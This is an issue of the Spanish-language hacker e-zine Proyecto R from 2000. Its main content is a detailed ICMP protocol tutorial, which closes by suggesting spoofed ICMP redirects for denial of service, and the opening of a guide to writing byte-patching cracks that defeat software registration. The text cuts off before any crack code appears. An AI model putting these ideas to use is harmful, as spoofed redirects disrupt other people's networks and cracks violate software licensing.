Protocolo ICMP, Creacion de Cracks tipo Search & Destroy, Descubriendo Linux Red Hat 5.0, Access Control List - ACL, Entrevista al Abogado de la Causa, LiLo para Linux, Micro - Nano Tech, Programacion en 546.604.465 Pasos, Publicacion Web Segura con Ms Proxy, 3 1/2 (O lo que alguna vez quizo pero no pudo), Niveles de Seguridad en el AS/400, Noticias del Mundo del Espectaculo, Bug.....
Texto Completo:
OYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECT
YECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYEC O
ECTO~ ~YECTOPROYECTOPROYECTOPROYECTOPROYECTOPROYE P
CTOP osecmc+e. YTOPROYECTOPROYECTOPROYECTOPROYECTOPROY R
TOPR M$$dbGq$$L YPROYECTOPROYECTOPROYECTOPROYECTOPRO << PROYECTO_R >> O
OPRO WTQ ~Q$$ ROYECTOPROYECTOPROYECTOPROYECTOPR Y
PROY RN$ $$* OYECTOPROYECTOPROYECTOPROYECTOP EL PRIMER MAGAZINE E
ROYE !@$ .dR$! dYECTOPROYECTOPROYECTOPROYECTO ELECTRONICO C
OYEC $$$ojuW@# dYECTOPROYECTOPROYECTOPROYECT CHILENO T
YECT $TRne?$$ YECTOPROYECTOPROYECTOPROYEC O
ECTO $WR 4$$L YCTOPROYECTOPROYECTOPROYE LA COPIA INFELIZ DEL EDEN P
CTOC $$R RTN YOPROYECTOPROYECTOPROY R
TOPR $$R `M$: YROYECTOPROYECTOPRO E-MAIL: O
OPRO $EN M$W: YYECTOPROYECTOPR
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Y
PRP .+***@. `*!Rp. ~YOPROYECTOP E
ROb. .*``W@~. YROYECTO URL: C
OYECTOPROYEb. .dOYECT http://www.cdlr.org T
YECTOPROYECTOPROYECTOPROYEC O
OPROYECT0PROYECT0PROYECT0PROYECT0PROYECT0PROYECT0PROYECT0PROYECT0PROYECT0PROY
NUMERO 9
Mayo 15 de 2000
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: DISCLAIMER ::--..
Toda la informacion aqui contenida se publica unicamente con fines
educativos, el mal uso de la misma no sera en ningun caso responsabilidad
del editor ni de alguno de los miembros del staff, en algunos casos esa
misma informacion es solo un modo de diversion, ya que lo que aqui se
expone puede ser totalmente falso
Aunque poner en practica algunas de las cosas aqui publicada puede ser
ilegal, en ningun momento pretendemos inducir a la ilegalidad con
lo aqui expuesto.
Los acentos y caracteres especiales han sido eliminados para evitar
problemas de compatibilidad con algunos sistemas
Editor Recomendado Edit del DOS
En otros no se ve del todo bien
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
ILOVEYOU
Yeahhh Sure... XDDD
..--:: Staff Oficial ::--..
PlaXiuS Taker
AndyK ArcangneT
Mate Swichman Don Cucumber
Tonik Mr. Nexus
TeeSPy CHacK
Death_Bot Billy
PerseoNet PunkyX
Por que sera que nunca me acuerdo del Staff completo..???
Siempre me sobra gente y siempre me falta gente...
..--:: Lamer del Mes ::--..
GrEeNhAcK
www.greenhack.8k.com
Hay que tener cuidado con este tipo...
Sin entras a la pagina mencionada no vayas a pasar el mouse por donde
dice que no debes hacerlo... cuidado, yo cai ahi, y me toco aguantarme el
cruel martirio..!!! (presionar Aceptar 100 Veces) y luego dice, la
proxima seran 1000... Igual, lo volvi a pisar, igual fueron 100 veces.
Lo bueno del cuento es que al final me di cuenta que mi barra espaciadora
necesita aceite... XDDD
Alguien puede decirle a este tio como puede conseguir el OP en algun
canal de IRC..???
Yo paso, de IRC no se nada... I'm Elite, yo solo utilizo NetMitin..!!!
[NdE: Esta es otra de las partes numero, no encontramos a quien mas
montarsela, ademas los que si le dan duro a eso son los de Antilammer
Zone y no queremos quitarles el trabajo]
..--:: Soporte 911 ::--..
Usuario: Alo soporte..???
Soporte: Si se~or, en que le puedo ayudar..???
Usuario: Esteee, tengo una pregunta...
Soporte: Si cuenteme...
Usuario: A ver, de casualidad usted conoce a Mail Delivery Subsystem
Soporte: Mmmm, y como por que lo dice o que..???
Usuario: No, es solo que cada rato me envia e-mails que no le he pedido
Plop..!!!
..--:: Saludos ::--..
SET http://www.set-ezine.org
(Nuevo Site... muy bien)
RaregaZz http://raregazz.acapulco.uagro.mx
(Aunque parece que andan mas perdidos que nosotros)
JJF/Hackers Team http://www.jjf.org
(Estos si ya se pasaron)
InET http://www.warpedreality.com/inet
(Estamos esperando su proxima edicion, segun Chismes
sale mas o menos en un Mes)
HVen http://www.hven.com.ve
(Linux En Disquettes... vamos bien..!!!)
Zine Store http://surf.to/zs
Raza-Mexicana http://www.raza-mexicana.org
A diferencia de otros numeros, durante la edicion de este, me encontraba
completamente sobrio, debe ser por que la hice en horas de oficina...
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: Contenidos ::--..
01. Editorial ......................................... Taker
02. Protocolo ICMP .................................... TeeSPy
03. Creacion de Cracks tipo Search & Destroy .......... _Bl00dFeaST_
04. Descubriendo Linux Red Hat 5.0 .................... Mr. Nuk3m
05. Access Control List - ACL ...................... ColuX
06. Entrevista al Abogado de la Causa ................. Mr. Nexus
07. LiLo para Linux ................................... MTS
08. Micro - Nano Tech ................................. TriNo
09. Programacion en 546.604.465 Pasos ................. SHISEI BRUJO
10. Publicacion Web Segura con Ms Proxy ............... PlaXiuS
11. 3 1/2 (O lo que alguna vez quizo pero no pudo) .... Varios
12. Niveles de Seguridad en el AS/400 ................. Taker
13. Noticias del Mundo del Espectaculo ................ ToniK
14. Bug ............................................... Don Cucumber
15. Ha llegado Mail ................................... Taker & Plaxius
16. Chistes, Cuentos y otras burradas ................. Varios
17. Llaves PGP......................................... CDLR
18. EOF ............................................... Editor
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 01. Editorial ::--..
by Taker
Hola, nuevamente estamos con ustedes, se que nos demoramos mucho, pero ya
estamos de vuelta, han sucedido muchas cosas desde el 10 de diciembre de
1999, a diferencia de lo que muchos pensaban, nosotros si pasamos el cambio
de a~o XDD (que no de milenio, que ese aun no se acaba), si durante este
tiempo de ausencia pasaron por nuestro sitio web se habran dado cuenta que
tuvimos algunos problemas, que esto, que aquello, cambio de server a un
hosting gratuito, parece que las cosas ya se han normalizado en ese sentido,
aunque uno nunca sabe.
Una de las cosas mas importantes durante este tiempo fue la visita de un tal
Taker (si, si, yo mismo XDDD ) a Chile, por fin hubo un encuentro en persona
entre una buena cantidad del staff de CDLR que no todos pues son grandes las
distancias que nos separan, fue un gran encuentro y tuve unas excelentes
vacaciones, aunque se siente un poco extra~o eso de tener sol desde las 6 am
hasta las 10 pm.XDD Hubo tiempo para concretar el destino del grupo, pues
hasta un poco antes de ese viaje la permanencia del grupo en el under estaba
en entredicho por los problemas que nos estaban acosando durante los ultimos
dias de diciembre.
Durante este tiempo de ausencia estuvimos trabajando (y aun lo estamos
haciendo) en proyectos que pronto veran la luz, asi que deben estar
pendientes, porque lo que viene son cosas grandes, un poco demoradas si, por
su volumen y el tiempo de investigacion que le estamos dedicando pues
pensamos que difundir conocimiento entre nuestros pueblos es un paso
importante para acabar con muchos de los problemas que aquejan a nuestra
sociedad.
Imagino que se habran dado cuenta el cambio en el aspecto de la Web... mm, un
poco mas seria, algunos cambios en el staff, menos trabajo, bueno, casi nada
de trabajo, la demora de este numero fue por algo mas que problemas, les voy
a confesar algo... (jeje, espero que los de CDLR no lean esto... vamos, press
Av pag now), teniamos una enfermedad llamada perezitis aguda..!!!, ya, nadie
escribio nada durante este tiempo (bueno casi nadie, ya estaba lista la
entrevista con Almeida), creo que en realidad el problema fue de Y2K, quizas
no utilizamos los parches correctos para nuestros cerebros... XDDD, ya que
el problema comenzo precisamente el 31 de Diciembre (un poco antes), porque,
aunque ustedes no se dieron cuenta, en esa fecha iba a salir - Proyecto R
Apocaliptic Edition - y nunca salio...
Ok, de todas formas ya cargamos los parches correctos... pero aun hay gente
que anda cargada con SP2 en sus sistemas, una peque~a recomendacion, antes de
buscar algo mira bien en donde buscas... que eso de buscar el directorio del
IIS en un servidor con Linux..!!!, nos os veo muy bien, si siguen asi
tendremos www.cdlr.org, nt.cdlr.org y linux.cdlr.org para mucho rato..!!!, ya
por lo menos ahora saben que buscan... solo espero que no vayan por el passwd
entrando por ftp anonimo... XDDD uno nunca sabe. Igual, serian los mismos de
http://members.xoom.com/fuck_cdlr (Despues digan que no les dimos credito).
Ya decia yo... no podemos ser anonimos toda la vida... XDDD
No mas carreta...
Aqui los dejo con el numero 9 de su E-zine.
Enjoy It.
Editor
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 02. Protocolo ICMP ::--..
By TeeSPy
Protocolo ICMP
by: TeeSPy -
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
0:...Introduccion...
Aki, no mas de lo mismo! Estas harto de los tipicos articulos TCP/IP de toda
la vida?!, aki esta tu solucion. Ahora uno de ICMP... Bueno, bueno... No me
salgan con eso de ke ICMP esta dentro de TCP/IP... eso ya lo sabia :P. La
cuestion es ke este va especificamente de ICMP, y no de TCP/IP en general.
Pasando a lo serio, expliko...
ICMP es un protocolo que se encuentra definido dentro de los protocolos
TCP/IP, y es el encargado de proporcionar un sistema mediante el cual los
ruteadores y HOST's de las redes se manden mensajes de error y de control
entre ellos, para arreglar las cosas cuando andan mal, o se necesita algun
cambio.... Vas entendiendo ahora por ke ICMP significa "Internet Control
Message Protocol" ??
A lo que vamos. Supongamos esta situacion. El host A manda un datagrama a
B, A y B estan algo lejos. Cuando A manda el datagrama, este pasa a travez
de una serie de routers, hasta que llega a uno que lo puede entregar a su
destino final. Pero que pasa si el datagrama sigue viajando, pero llega un
momento en que el router que se supone "deberia" poder entregar el datagrama
al destino final no lo puede hacer por algun motivo ??. Lo normal seria
avisarle a la fuente de por que no pudo entregar el datagrama, y tambien
seria conveniente avisarle por que no lo pudo hacer. Pero como le avisa el
router B a A sobre esto ??. El router B emplea ICMP para dar este aviso.
Por su puesto, este es solo un ejemplo del uso de ICMP. Mas adelante veremos
los demas usos.
Es importante, eso si, destacar que ICMP solo proporciona un mecanismo para
avisar a la fuente del error o para solicitar cambios, pero es la fuente la
que deberia segun el tipo de mensaje ICMP recibido tomar las acciones
correspondientes.
Tambien es necesario decir que ICMP es una parte OBLIGATORIA de cualkier
implementacion de TCP/IP, y a demas de decir esto, tbn digo que sin el
encontrarias las cosas un tanto "raras" al entrar a internet :P.
0.1:...Desarrollo...
0.1.0: Formato de los mensajes ICMP
Los mensajes ICMP, no son mas que un datagrama IP comun y corriente. Su
secreto esta en la seccion de datos de este datagrama. Es alli donde se
especifica que tipo de mensaje ICMP es el que se esta mandando, y su
formato. No podemos hablar de un formato especifico para los mensajes ICMP.
Cada tipo de ICMP tiene su propio formato. Lo que si podemos hacer, es dar
una imagen general de las partes comunes a todos los mensajes ICMP. (me esta
matando esto de repetir tanto "mensaje ICMP". Definitivamente cuando grande
no sere escritor).
--------------------------------------------------------
| Encabezado | Datos de |
| de la trama | la trama |
--------------------------------------------------------
|
\_/
-----------------------------------------
| Encabezado | Area de datos del |
| datagrama | datagrama |
-----------------------------------------
|
\_/
----------------------------
| Encabezado | Datos |
| ICMP | ICMP |
----------------------------
El dibujo es simple. Nos muestra que un mensaje ICMP se manda encapsulado 2
veces. Primero se encapsula lo referente a ICMP dentro de un datagrama IP,
el cual a su vez se encapsula dentro de una trama IP para ser enviado.
Ahora vamos a analizar un poco la parte donde estan los datos del mensaje
ICMP propiamente tal (osea, lo que va dentro del cuadro mas chico de aki
arriba :P)
Todos los mensajes ICMP comienzan con los mismos 3 campos. el campo TYPE (8
bits), CODE (8 bits) y CHECKSUM (16 bits). Los nombres de los campos lo
dicen todo... TYPE es para identificar el tipo de mensaje ICMP ke estamos
mandando, CODE otro numero que indica el tipo de mensaje, pero que depende
de TYPE. Osea, cada Tipo (TYPE) de mensaje ICMP puede tener diferentes
Codigos (CODE). El tercer campo, CHECKSUM, es solo una suma de verificacion.
Bueno, los tipos de mensaje ICMP son los siguientes:
Tipo de mensaje - Codigo numerico del tipo
Respuesta de eco 0
Destino Inaccesible 3
Disminucion de origen 4
Solicitud de cambio de ruta 5
Solicitud de eco 8
Tiempo exedido 11
Problema de parametros 12
Solicitud de Marca de tiempo 13
Respuesta de Marca de tiempo 14
Solicitud de informacion (esta obsoleto) 15
Respuesta de informacion (esta obsoleto) 16
Solicitud de mascara de direccion 17
Respuesta de mascara de direccion 18
Mas adelante explicaremos cada uno de estos tipos.
0.1.1: El secreto de los primeros 64 bits del datagrama
Como veremos mas adelante, muchos de los mensajes ICMP que mandamos
contienen en su area de datos los primeros 64 bits del datagrama que causo
el error. Se preguntaran, y por que es esto?
Bueno, es por que el software TCP/IP esta dise~ado para codificar informacion
importante en los primeros 64 bits de cada datagrama, por lo tanto, como ICMP
manda en algunos de sus mensajes estos primeros bits, es mas sencillo para la
fuente determinar por que se produjo el error.
0.1.2: Tipos de mensaje ICMP
A continuacion, paso a explicar cada uno de los 13 (bueno, en realidad no
todos... para ke voy a explicar los obsoletos no?) tipos de mensaje ICMP.
0.1.2.1: Solicitud/Respuesta de eco (tipos 8 y 0)
El protocolo ICMP dispone de esta importante y muy usada herramienta. La
solicitud de eco y respuesta de eco.
Su proposito es ayudar a usuarios de redes a detectar problemas que ocurran
en la red.
Funciona asi: Un host manda una solicitud de eco a otro host, el cual la
recibe, y manda inmediatamente una respuesta de eco.
A simple vista puede parecer trivial, y lo es, pero aun asi es muy importante
ya que nos permite saber si el host en el otro lado esta vivo o no, podemos
obtener la velocidad con la que esta respondiendo el host mediante una serie
de solicitudes, asi cuando llegan se calcula el tiempo que se demoraron y
despues sacamos el promedio, nos permite saber si hay problemas en los
ruteadores intermedios, ya que estos son los que deben rutear el datagrama,
etc.
Su formato es simple. Tiene los 3 campos comunes a todo mensaje ICMP, con el
campo TIPO en 8/0 (dependiendo si es solicitud o respuesta respectivamente),
el campo CODIGO en 0, la suma de verificacion, luego 2 campos, IDENTIFICADOR
y NUMERO DE SECUENCIA, que son usados por el receptor para responder a las
solicitudes (es algo asi como para que el que envia el mensaje sepa que el
mensaje que recibio de vuelta es, en realidad, la respuesta a la solicitud
que este hizo), y un ultimo campo, denominado "OPTIONAL DATA", en el cual van
datos OPCIONALES, los cuales seran devueltos en la respuesta a la solicitud.
Bueno, y por su puesto, hace falta presentar la herramienta que hace que toda
esta complicacion se vuelva facil... esta herramienta es el ya muy conocido
PING. Si, el comando ping utiliza ICMP para testear si los hosts estan vivos,
y normalmente tiene opciones como mandar datos de basura para agrandar el
datagrama que sera enviado (estos datos irian en el campo OPTIONAL DATA),
contiene opciones para calcular el tiempo de respuesta de un host, y otras
cosas mas. Todo esto lo hace en base a Peticiones / Respuestas de eco.
0.1.2.2: Destino inaccesible (tipo 3)
Este tipo de ICMP sirve para que cuando un ruteador no puede rutear un
datagrama o no puede entregarlo por alguna razon, pueda avisar a la fuente.
Pueden haber distintas causas por las cuales un ruteador no pudo accesar un
host, y cada uno de estas causas tiene su propio codigo, el cual va inserto
en el mensaje ICMP. Los codigos y sus correspondientes definiciones son:
0 Red inaccesible
1 Anfitrion inaccesible
2 Protocolo inaccesible
3 Puerto inaccesible
4 Se necesita fragmentacion
5 Falla en la ruta de origen
6 Red de destino desconocida
7 Anfitrion de destino desconocido
8 Anfitrion de origen aislado
9 Comunicacion con la red de destino administrativamente prohibida
10 Comunicacion con el anfitrion de destino administrativ... prohibido
11 Red inaccesible por el tipo de servicio
12 Anfitrion inaccesible por el tipo de servicio
Bueno, los mensajes ICMP de este tipo, tendrian un formato mas o menos asi:
Los 3 campos comunes a todos los mensajes ICMP (TIPO (3), CODIGO (0-12)
CHECKSUM) mas un area de 32 bits con los bits puestos a cero, y al final el
encabezado de red de redes mas los primeros 64 bits del datagrama ke no se
pudo entregar.
Como vimos, los destinos pueden no ser accesibles por diversos motivos, pero
aun asi hay veces en que un datagrama puede no llegar a su destino y TCP/IP
no se da cuenta de esto, por lo ke no hay mensaje ICMP para avisar. Es el
caso por ejemplo de cuando uno manda un datagrama a una makina de destino que
esta conectada a una ethernet. El hardware no proporciona acuses de recibo,
por lo que el ruteador sigue enviando mensajes al destino aunke este este
apagado, sin descubrir que los datagramas no etan llegando. En resumen,
aunque ICMP proporciona metodos de deteccion de destino inaccesible, no puede
controlar la totalidad de los casos.
Bueno, y por otro lado, creo ke todos los codigos son autoexplicativos, asi
ke no vale la pena explicarlos.
0.1.2.3: Disminucion de tasa al origen (tipo 4)
Cuando un HOST envia datagramas, estos son recibidos por un ruteador, el cual
tiene la tarea de encaminarlos. Pero que pasa si tenemos una makina muy
potente, que es capaz de enviar mas datagramas a la vez de los que el
ruteador puede procesar, o si varios destinos necesitan los servicios de un
ruteador a la vez, y el ruteador no puede procesar todo a la vez?
Lo que hace el ruteador, es encolar todos los mensajes que le llegan en
memoria, e ir procesandolos de a poco, pero como te debes imaginar, los
ruteadores no tienen memoria infinita. Es entonces, cuando el ruteador esta
saturado de trabajo y no puede seguir recibiendo datagramas, cuando utiliza
los mensajes ICMP de disminucion de tasa al origen para solucionar este
problema.
Al saturarse un router, este empieza a descartar los datagramas que le
llegan, y por cada uno que descarta, envia un ICMP de disminucion de tasa al
origen. Lo que deberia hacer un host al recibir uno de estos ICMP's, es
comenzar a disminuir la velocidad de transmicion de los datagramas
gradualmente, hasta que deje de recibirlos. Como no hay un tipo de mensaje
ICMP para aumentar la tasa al origen, lo que hace un host es que, al dejar
de recibir los ICMP de disminucion de origen, empieza nuevamente a subir
(siempre gradualmente) la velocidad con la que manda los datagramas.
Los ruteadores tambien pueden usar tecnicas mas avanzadas para controlar la
saturacion. Algunos envian mensajes ICMP's de disminucion de tasa al origen
antes de saturarse a los host's que estan enviando datagramas muy
rapidamente, otros detectan cuando sus colas de espera estan creciendo muy
apresuradamente, y entonces evitan el congestionamiento.
Y por ultimo, el formato de estos ICMP's es el siguiente:
Los 3 campos comunes a cualkier ICMP (Tipo (4), Codigo (0) y CHECKSUM), un
campo no usado de 32 bits y luego de esto el encabezado de redes mas los
primeros 64 bits del datagrama que fue descartado.
0.1.2.4: Solicitud de cambio de ruta (tipo 5)
Cuando un router detecta que un host esta mandando un datagrama con una ruta
que no es la mas optima, este manda al host un mensaje ICMP de solicitud de
cambio de ruta, con lo cual el host puede mantener sus tablas de ruteo muy
reducidas, pero de todas maneras estas contienen rutas optimas para todos los
destinos en uso.
Al detectar un router esta situacion, este ademas de mandar el ICMP de
redireccionar, manda el datagrama a su destino original. Osea que el
datagrama NO se descarta.
Los mensajes ICMP de solicitud de cambio de ruta solo permiten la interaccion
entre un host y un router que esten en una red conectada directamente. Los
routers utilizan otros metodos para mantener sus tablas de ruteo
actualizadas.
El formato de un mensaje ICMP de solicitud de cambio de ruta es el siguiente:
Los 3 campos comunes a todos los mensajes ICMP (Tipo (5), Codigo (0-3) y
CHECKSUM), La direccion de red de redes (internet) del router y por ultimo
el encabezado de redes mas los primeros 64 bits del datagrama.
El campo "direccion de red de redes" contiene la direccion del router que
debera ser usado para alcanzar el destino hacia el cual el host mando el
datagrama que provoco el envio del mensaje ICMP.
Los codigos (campo Code) y sus definiciones son:
0 Redireccionar datagramas para la red (obsoleto)
1 Redireccionar datagramas para el host
2 Redireccionar datagramas para el tipo de servicio y la red
3 Redireccionar datagramas para el tipo de servicio y el host
Los codigos creo que se explican por si mismos.
0.1.2.5: ICMP de Tiempo exedido (tipo 11)
Cuando un datagrama IP se manda a travez de una red, este lleva un campo
conocido como "contador de saltos". Este campo debe ser decrementado en 1 por
cada "salto" (paso de un host a otro) que da el datagrama. Esto se hace
debido a que a veces los ruteadores, por una mala configuracion, pueden crear
rutas circulares, por ejemplo, 2 ruteadores mandando un datagrama al otro
para que este lo rutee. O mas ruteadores haciendo lo mismo.
El mecanismo para evitar eso consiste en que cuando el contador de saltos de
un datagrama llega a 0, se manda un mensaje ICMP de "Tiempo Exedido" (time
exeed) al host desde donde se origino el datagrama y el datagrama es
descartado.
Otro punto importante a considerar es que cuando llega el primero fragmento
de un datagrama a su destino, el host que lo recibe arranca un temporizador
y considera que un error ocurrio si ese temporizador expira antes que hallan
llegado todas las piezas del datagrama.
El formato del ICMP de tiempo exedido es:
Los 3 campos comunes a todo mensaje ICMP (Tipo (11), Codigo (0-1) y
CHECKSUM), un campo de 32 bits no utilizado y luego el encabezado de redes +
los primeros 64 bits del datagrama que fue descartado.
Los codigos y sus definiciones son:
0 Conteo de tiempo de vida exedido (primer caso)
1 Tiempo para el reensamblado exedido (segundo caso)
0.1.2.6: Problema de parametros (tipo 12)
Cuando un router o un host encuentran un datagrama con algun error que no ha
sido considerado en los casos anteriores (por ejemplo un campo malformado en
un datagrama), y el problema es tan severo como para tener que descartar el
datagrama, se manda un mensaje ICMP de problema de datagramas y se descarta
el datagrama.
Y el formato del mensaje ICMP de problema de parametros es el siguiente:
A ke nadie adivina ke va al principio :), tipo (12), codigo (0-1) y CHECKSUM.
Luego de eso, va un campo denominado "pointer", el cual contiene un puntero
que es usado para identificar el octeto del mensaje ke causo el problema.
El codigo 1 se usa cuando el problema radica en que falta una opcion
requerida en el datagrama, y el 0 se usa para cuando uno de los parametros
esta malformado.
0.1.2.7: Solicitud/Respuesta de Marca de tiempo (tipo 13/14)
En muchos casos dos maquinas de internet pueden necesitar sincronizar sus
relojes, ya sea por motivos de comodidad para los usuarios o para el buen
funcionamiendo del software. Una de las muchas tecnicas que hay para hacer
esto (y una de las mas faciles tambien) es con un mensaje ICMP de marca de
tiempo.
Una maquina (la que quiere obtener la marca de tiempo de otra) envia un ICMP
de Solicitud de Marca de tiempo (tipo 13) a un destino (el reloj con el que
quiere sincronizarse). Luego de esto, es devuelto un ICMP de Respuesta de
marca de tiempo (tipo 14), el cual la primera maquina recibe y decide que
hacer con esto.
El formato de este ICMP es el siguiente:
Tipo (13/14), Codigo (0) y CHECKSUM.
Luego un campo llamado "Identificador" y otro "Numero de secuencia", despues
3 campos, llamados consecutivamente "Originar Marca de tiempo" "Recibir Marca
de tiempo" y "Transmitir Marca de tiempo".
No tengo para que explicar los 3 primeros campos verdad ?
El campo identificador y Numero de secuencia los usa la fuente para poder
determinar que soliitud corresponde a que respuesta.
El campo "Originar Marca de tiempo" es llenado por la fuente con la hora que
tenia esta justo antes de enviar el mensaje. "Recibir Marca de tiempo" es
llenado con la hora de la maquina destino justo al momento de recibir una
solicitud y el campo "Transmitir Marca de tiempo" es llenado con la hora de
la maquina destino justo antes de transmitir la respuesta.
Los 3 ultimos campos son usados para poder hacer una sincronizacion mas
exacta de las horas de las 2 maquinas, ya que debido a que estas 2 pueden
estar muy lejos, el ping (tiempo que demora un datagrama en llegar a otra
maquina en jerga computacional) puede ser muy grande.
De todas maneras, debido a que el ping no es estable y puede cambiar de un
momento a otro y de que datagramas se pueden perder, no esta garantizado
que las 2 maquinas tengan sus horas ajustadas exactamente.
0.1.2.8: Solicitud/Respuesta de informacion (tipo 15/16)
Blah blah blah... para que explicarlos si estan obsoletos?
Para que no te quedes con la duda :)
Originalmente servian para obtener la direccion de red en el arranque del
sistema. Actualmente hay protocolos avanzados dedicados solo a eso (RARP y
BOOTP)
El formato de estos mensajes ICMP era:
No tengo idea pero apuesto mi vida a que los primeros campos eran Tipo
(15/16), Codigo y CHECKSUM :P
0.1.2.9: Solicitud/Respuesta de mascara de direccion
Por si no lo sabias, una direccion IP tiene 2 campos: uno llamado "netID" y
otro llamado "hostID". El primero representa la red a la que esta conectada
la maquina, y el segundo representa especificamente el host del que estamos
hablando. El problema esta en que estos 2 campos no tienen una cantidad de
bits especificos, por lo que puede que el primero sea mayor que el segundo y
viceversa.
Como en algunos casos, por ejemplo el direccionamiento de subred, que es
una tecnica que permite que una sola direccion de red abarque muchas redes
fisicas, es necesario conocer la mascara de red (conjunto de bits que
nos indican la longitud y localizacion del netID y el hostID) de un host, se
ha creado un mensaje ICMP (adivina de cual hablamos) para este proposito.
Este mensaje es enviado desde el host que quiere conocer la mascara de red
de una red, hacia el router de esa red. El router es el que genera la
respuesta a este ICMP.
El mensaje puede ser enviado directamente al router o por difusion.
Y el formato del ICMP de Solicitud/Respuesta de mascara de direccion es:
Tipo (17/18), Codigo (0) y CHECKSUM, luego un "Identificador" y un "Numero de
secuencia", que sirven para identificar que respuesta fue generada para que
solicitud. Un ultimo campo con la mascara de direccion, que es llenado por el
ruteador que genera la respuesta.
0.1.3: Y que puedo yo hacer con todo esto ??
Pff, pero como se te ocurre preguntar eso!
Primero que nada, es importante sabes como funciona internet, e ICMP es una
parte importante y obligatoria en todo esto.
Segundo, se pueden hacer cosas divertidas jugando con ICMP. Por ejemplo,
mandamos un ICMP redirect (con la IP spoofeada) a un host, diciendole
que hay una ruta mas corta al destino que quiere alcanzar. El host destino
no dudara (a menos que el admin lo haya configurado especificamente para
no hacerlo, con lo cual no estaria cumpliendo con el RFC RFC1122) en aceptar
ese ICMP, con lo cual tenemos un potencial DoS. (esta idea fue tomada de un
paper publicado en lista de correo vuln-dev).
Conozco un programa, llamado ICMPush creado por un integrante del grupo
espa~ol !Hispahack que permite crear mensajes ICMP a nuestro gusto, y
mandarlos a donde queramos y con los parametros que deseemos. Incluso podemos
spoofear la direccion desde la que fue mandado el mensaje. Buscalo en
hispahack.ccc.de
0.2:...Conclusion...
ICMP es muy util y debe ser usado siempre con toda implementacion de ICMP.
Ademas, como conclusion personal debo decir que urgentemente me hace falta
un computador nuevo ya que escuchando mp3 (up's, ilegal?? nunca dije nada :X)
y escribiendo este articulo a penas podia chatear. (sisi, 3 cosas a la vez...
hay ke adaptarse al S.O. no ?? sistema multitarea, usuario multitarea.
Sistema multiusuario, usuario multiusuario... que no sabian que yo era
multiusuario !!??, pff, si mientras estuve en la carcel como Kevin Mitnick
estaba aki como TeeSPy y en el chat hablando con alguno de ustedes
seguramente.
Ahh!, como ultima conclusion... Mandennos sus articulos para Proyecto_R!
Hace tiempo que no recibimos mucho... sera por que estuvimos offline. La cosa
es que ahora pueden seguir haciendo articulos (de calidad, obviamente), y los
pueden mandar al mail del grupo o a cualquiera de los integrantes.
Aki me detengo por que no kiero que despues anden diciendo que en mis
articulos mis Conclusiones/Comentarios abarcan mas que la materia en si :)
TeeSPy / CDLR Security Team /
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Si no te gusta mi gramatica, manda un mail pidiendo la direccion/telefono de
mi profesor de castellano. No dudare en dartela! de echo estaria contentisimo
de ser parte del atentado (atentos psicopatas alla afuera, aki potencial
victima, lo digo en serio!)
------------------------------------TeeSPy-----------------------------------
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 03. Creacion de Cracks tipo Search & Destroy ::--..
By _Bl00dFeaST_
LET'S ROCK :
Este articulo ha sido escrito con la finalidad de ensen~arles a crear sus
propios cracks tipo search & destroy 100% assembler, por lo que debes tener
al menos un conocimiento basico de lenguaje ensamblador y al menos haber
crackeado un programa para entender este tutorial.
Los cracks "Search & Destroy" son pequen~os programas que buscan un
determinado string o una secuencia de bytes y la cambian por otra para que el
software a crackear realice determinada accion (saltarse una nagscreen,
eliminar limite de tiempo ,registrar el programa,etc.)
Este tipo de cracks pueden incluso trabajar con versiones posteriores de
dicho software, ya que si el autor no ha cambiado el metodo de proteccion
puede que el crack encuentre la misma secuencia bytes de proteccion que la
version para la cual fue escrito ,solo es una probabilidad ;-)
Personalmente prefiero los cracks tipo "Offset patcher" pero ese es otro
cuento al cual no voy a entrar en detalles por ahora.
HERRAMIENTAS :
- W32Dasm 8.9 o posterior (Requerido)
- Editor Hexadecimal : Hview, HexWorkshop, etc. (Opcional)
- Borland Turbo Assembler 5.0 (Requerido)
- L0phtcrack 2.0 o posterior (La ultima version disponible era la 2.5)
En la ezine SET numero 21, articulo 0x11 se mostraba como crackear el
L0phtCrack 2.0 para Windows 95, pero a mi gusto, este metodo no eliminaba la
molesta nagscreen (pantalla de dialogo que pide una confirmacion para entrar
en el programa), Voy a utilizar el l0phtcrack95 2.0 y ultima version la 2.5
como ejemplo; para que se entienda mejor. (NOTA : Lean la SET 21 ;-))
Asi que investigando un poco mediante "death listing" con el W32Dasm encontre
